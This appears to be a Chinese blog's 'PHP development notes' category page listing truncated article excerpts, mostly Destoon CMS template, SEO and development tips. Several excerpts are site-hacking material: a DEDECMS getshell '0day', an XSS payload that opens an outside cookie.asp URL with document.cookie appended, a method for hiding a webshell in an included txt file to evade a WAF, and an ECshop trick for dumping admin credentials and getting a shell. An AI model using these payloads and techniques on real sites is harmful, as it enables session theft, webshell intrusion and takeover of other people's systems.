随笔分类 - PHP开发笔记
每天记录关于PHP方面的笔记
摘要:漏洞原因:DEDECMS由于编辑器过滤不严,将导致恶意脚本运行。可getshell取得权限。为什么说它是0Day呢?能getshell的都算0Day(鸡肋发挥起来也能变凤凰)目前只是测试过5.3到5.7版本。其他更早的版本大家就自由发挥吧。下面说说利用方法。条件有2个:开启注册开启投稿注册会员-发表
阅读全文
摘要:保存为cookie.asp 利用代码: <script>window.open('http://zhimo.yuanzhumuban.cc/cookie.asp?msg='+document.cookie)</script>
阅读全文
摘要:很多拿站的朋友,都知道大马很多都会被安全狗拦截,最近一个大牛给我一个方法,竟然成功,所以分享下这个方法。 将大马写到一个txt文件里面,命名为dama.txt,再建一个文本文档,asp的就写入:<!–#include file=”dama.txt”–> ,保存为X.asp,两个文件传同目录下,访问u
阅读全文
摘要:昨晚上翻阅一本技术书籍中,找到灵感,发现的ECshop漏洞。 搜索关键字:关键字:powered by ecshop 方法一: 普通代码: 变种代码: 直接在网站后台加入代码回车就能爆出帐号密码,再去掉代码加上/admin回车就能直接进后台了。 拿shell方法很简单,找到“库项目管理”再选择“配送
阅读全文
摘要:最近研究destoon内核开发,开发了一个大型的信息站点:http://www.kaotop.com/ 但是新站如何提高收录和排名呢?网上有很多主动提交的方法,今天我分享一个自己原创的超级简单的主动推送。 首先:先确定你要推送的模块,我是以资讯为例,因为资讯文章信息多,主动推送有好处。到Module
阅读全文
摘要:网站被镜像的危害 通俗的讲,恶意镜像者意图利用自己有一定权重的域名进行威压,通过某些手段复制了你的站点,除了域名不一样之外,其他内容一模一样,用户或许根本无法分辨。甚至对于一些新的站点,搜索引擎都会迷惑到底哪个是真的站点,那么就有可能正牌的网站被删除收录,而盗版的却被搜索引擎青睐。 虽然目前我们还不
阅读全文
摘要:近期研究DT,从DT4.0一直研究到DT7.0,总算也有些心得。最近重新开发设计了一个信息资讯站点:http://www.xuetong365.com/ 废话不多说,上教程 用于DESTOON7.0系统 到admin 目录替换 category.inc.php 刷新后台,然后每个模块的栏目分类后面会
阅读全文
摘要:最近研究dt6.0,官方内核默认是把搜索页屏蔽的,但是做seo的人都知道,搜索页聚合是争取排名的好地方,所以我就二次开发搜索页,具体可以查看前几期分享的,今天说说关于搜索的canonical的url乱码问题。 首页第一步:找到api/extend.func.php下在最后面插入以下函数,本函数是自己
阅读全文
摘要:最近没事,打算把自己的小项目改造为mip,进行测试学习,想把资讯栏目:http://www.kaotop.com/news/ 全部改造为mip。但是MIP改造一项是:图片标签的改造。而且dt内核跟其他不一样,不像wordpress和织梦一样简单,网上的资料也很少,所以本人就自己写了一个正则替换,希望
阅读全文
摘要:最近研究destoon内核开发,发现destoon6.0的搜索页面模块的标题太长,是搜索标题+模块+首页标题,这样导致标题过长,百度不喜欢,所以我经过修改成百度所喜欢的。 修改前截图: 修改的文件:/include/seo.inc.php 文件 在第90行左右,把$seo_title 修改为:$se
阅读全文
摘要:因为destoon7.0发布了,于是自己作死又下载了7.0,看了看7.0的模板确实比6.0好看多了,所以就打算把7.0的模板应用于6.0,在商业圈上出了一个问题,就是商业圈的圈子7.0调用与6.0不同,在此做下笔记! 6.0下商业圈圈子调用标签为: 7.0的商业圈圈子调取标签为: 看着以上是不是有点
阅读全文
摘要:最近没事玩上了destoon,所以就自己花一点时间整理了一下destoon标签,对开发有帮助,本篇文章由博客园-圆柱模板 博主整理发布 1.全局标签 2.连接地址 3.扩展功能等 4.首页调用 首页调新闻栏目(14为栏目ID)
阅读全文
摘要:当网站任意一个模块绑定了二级域名或者会员公司主页开启了二级域名时,必须设置cookie作用域,否则会导致二级域名站点不能显示正确的登录状态,js权限错误等问题(例如评论框显示不完全的现象)。 进入网站设置,安全中心可以设置Cookie作用域。 例如你的主站域名为 yuanzhumuban.cc,那么
阅读全文
摘要:1、包含模板 {template 'header'} 或 {template 'header', 'member'} 被解析为 : 表示使用 template/default/header.htm 模板文件: 被解析为: 表示使用 template/default/member/header.htm
阅读全文
摘要:一、模板存放及调用规则 模板存放于系统 template 目录,template 目录下的一个目录例如 template/default/ 即为一套模板模板文件以 .htm 为扩展名,可直接存放于模板目录例如 template/default/index.htm也可以存放于模板目录的子目录里例如 t
阅读全文
摘要:自己整理的destoon系统结构目录,希望对开发者有些帮助! ( /代表的是目录 ├ 代表的是文件 ) /about关于我们页面 ├index.html关于我们 ├copyright.html版权隐私 ├contact.html联系方式 ├agreement.html用户协议 /ad广告 ├inde
阅读全文
摘要:说说在destoon中,我们二次开发时新建的函数应该放哪里好? 发现部分同学,在学习研究destoon过程中,新建的一些php函数直接放在模块里面,须知这样放置的话,会产生些不良后果。 首先,新建的该函数,只能在模块通用,另外,如果官方更新了相关文件,不小心覆盖了怎么办? 其实destoon专门有个
阅读全文
摘要:今天有个朋友的DT系统生成静态出现 MySQL Query:SELECT * FROM [pre]article_21 WHERE status=3 and itemid<>516548 and keyword like '%龙慧祺 ORDER BY addtime desc LIMIT 0,10
阅读全文
摘要:修改方法:修改模板-》Homepage->contact.htm在 之后加上以下代码: 附map.php内容: 好了,就这样一个简单的添加百度地图自动标注就这样完成了!
阅读全文
浙公网安备 33010602011771号